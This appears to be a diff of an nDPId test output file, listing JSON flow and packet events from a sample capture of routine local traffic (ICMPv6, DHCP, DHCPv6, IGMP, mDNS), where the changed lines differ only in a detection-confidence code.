+00577{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":9752,"flow_last_seen":9752,"flow_idle_time":140000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":9752,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ffa4:e108","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00525{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":9752,"flow_last_seen":9752,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":9752,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":9752,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":62,"pkt_l4_len":8,"thread_ts_msec":9752,"pkt":"MzMAAAACCAAn5uVZht1gAAAAAAg6\/\/6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAAChQDu3AAAAAA="} -00586{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":9752,"flow_last_seen":9752,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":9752,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::2","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00586{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":9752,"flow_last_seen":9752,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":9752,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::2","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00530{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":9752,"flow_last_seen":9752,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":9752,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":9752,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"thread_ts_msec":9752,"pkt":"MzMAAAAWCAAn5uVZht1gAAAAACQAAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAAWOgAFAgAAAQCPAAECAAAAAQQAAAD\/AgAAAAAAAAAAAAH\/pOEI"} -00591{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":9752,"flow_last_seen":9752,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":9752,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00591{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":9752,"flow_last_seen":9752,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":9752,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":10250,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"thread_ts_msec":10250,"pkt":"MzMAAAAWCAAn5uVZht1gAAAAACQAAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAAWOgAFAgAAAQCPAAECAAAAAQQAAAD\/AgAAAAAAAAAAAAH\/pOEI"} 00532{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":10750,"flow_last_seen":10750,"flow_idle_time":140000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":10750,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":10750,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":10750,"pkt":"MzMAAAABCAAn5uVZht1gAAAAACA6\/\/6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAABiAAnqSAAAAD+gAAAAAAAAMUNUZ+WpOEIAgEIACfm5Vk="} -00593{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":10750,"flow_last_seen":10750,"flow_idle_time":140000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":10750,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00593{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":10750,"flow_last_seen":10750,"flow_idle_time":140000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":10750,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12446,"flow_last_seen":12446,"flow_idle_time":200000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":0,"thread_ts_msec":12446,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00853{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":12446,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":356,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":356,"pkt_l4_len":322,"thread_ts_msec":12446,"pkt":"\/\/\/\/\/\/\/\/CAAn5uVZCABFAAFWW8sAAIAR3cwAAAAA\/\/\/\/\/wBEAEMBQgLkAQEGAKZ4S30AAAAAAAAAAAAAAAAAAAAAAAAAAAgAJ+blWQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEDPQcBCAAn5uVZMgQKAAIPDAtNU0VER0VXSU4xMFEOAAAATVNFREdFV0lOMTA8CE1TRlQgNS4wNw4BAwYPHyErLC4vd3n5\/P8="} -00730{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12446,"flow_last_seen":12446,"flow_idle_time":200000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":0,"thread_ts_msec":12446,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"msedgewin10","fingerprint":"1,3,6,15,31,33,43,44,46,47,119,121,249,252","class_ident":"MSFT 5.0"}} +00730{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12446,"flow_last_seen":12446,"flow_idle_time":200000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":0,"thread_ts_msec":12446,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"msedgewin10","fingerprint":"1,3,6,15,31,33,43,44,46,47,119,121,249,252","class_ident":"MSFT 5.0"}} 00547{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12447,"flow_last_seen":12447,"flow_idle_time":200000,"flow_min_l4_payload_len":548,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":548,"flow_avg_l4_payload_len":548,"midstream":0,"thread_ts_msec":12447,"l3_proto":"ip4","src_ip":"10.0.2.2","dst_ip":"10.0.2.15","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01155{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":12447,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":590,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":590,"pkt_l4_len":556,"thread_ts_msec":12447,"pkt":"CAAn5uVZUlQAEjUCCABFEAJAAAAAAEARYI0KAAICCgACDwBDAEQCLAYSAgEGAKZ4S30AAAAACgACDwoAAg8KAAIEAAAAAAgAJ+blWQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATVNFZGdlIC0gV2luMTAucHhlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEFAQT\/\/\/8AAwQKAAICBgQKAAIDDwNsYW4zBAABUYA2BAoAAgL\/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12447,"flow_last_seen":12447,"flow_idle_time":200000,"flow_min_l4_payload_len":548,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":548,"flow_avg_l4_payload_len":548,"midstream":0,"thread_ts_msec":12447,"l3_proto":"ip4","src_ip":"10.0.2.2","dst_ip":"10.0.2.15","src_port":67,"dst_port":68,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12447,"flow_last_seen":12447,"flow_idle_time":200000,"flow_min_l4_payload_len":548,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":548,"flow_avg_l4_payload_len":548,"midstream":0,"thread_ts_msec":12447,"l3_proto":"ip4","src_ip":"10.0.2.2","dst_ip":"10.0.2.15","src_port":67,"dst_port":68,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12461,"flow_last_seen":12461,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":91,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":12461,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00568{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":12461,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":153,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":153,"pkt_l4_len":99,"thread_ts_msec":12461,"pkt":"MzMAAQACCAAn5uVZht1gDPpkAGMRAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAQACAiICIwBj3RcBE9HtAAgAAgAAAAEADgABAAEkIvGzCAAn5uVZAAMADAUIACcAAAAAAAAAAAAnAA0AC01TRURHRVdJTjEwABAADgAAATcACE1TRlQgNS4wAAYACAARABcAGAAn"} -00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12461,"flow_last_seen":12461,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":91,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":12461,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} +00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12461,"flow_last_seen":12461,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":91,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":12461,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":12512,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"thread_ts_msec":12512,"pkt":"MzMAAAAWCAAn5uVZht1gAAAAACQAAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAAWOgAFAgAAAQCPAOC1AAAAAQQAAAD\/AgAAAAAAAAAAAAAAAAD7"} 00514{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12513,"flow_last_seen":12513,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":12513,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00433{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":12513,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":12513,"pkt":"AQBeAAAWCAAn5uVZCABGAAAoICwAAAECGH8KAAIP4AAAFpQEAAAiAPkCAAAAAQQAAADgAAD7"} -00573{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12513,"flow_last_seen":12513,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":12513,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00573{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12513,"flow_last_seen":12513,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":12513,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00433{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":12524,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":12524,"pkt":"AQBeAAAWCAAn5uVZCABGAAAoIC0AAAECGH4KAAIP4AAAFpQEAAAiAPkBAAAAAQQAAADgAAD8"} 00433{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":12527,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":12527,"pkt":"AQBeAAAWCAAn5uVZCABGAAAoIC4AAAECGH0KAAIP4AAAFpQEAAAiAPoBAAAAAQMAAADgAAD8"} 00551{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":12529,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":12529,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":12529,"pkt":"AQBeAAD7CAAn5uVZCABFAAA\/aF0AAAERZEcKAAIP4AAA+xTpFOkAK6\/OAAAAAAABAAAAAAAAC01TRURHRVdJTjEwBWxvY2FsAAD\/AAE="} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":12529,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"msedgewin10.local"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":12529,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"msedgewin10.local"}} 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":12529,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":12529,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":97,"pkt_l4_len":43,"thread_ts_msec":12529,"pkt":"MzMAAAD7CAAn5uVZht1gATieACsRAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAD7FOkU6QArEAAAAAAAAAEAAAAAAAALTVNFREdFV0lOMTAFbG9jYWwAAP8AAQ=="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":12529,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"msedgewin10.local"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":12529,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"msedgewin10.local"}} 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":12529,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:3","src_port":63717,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 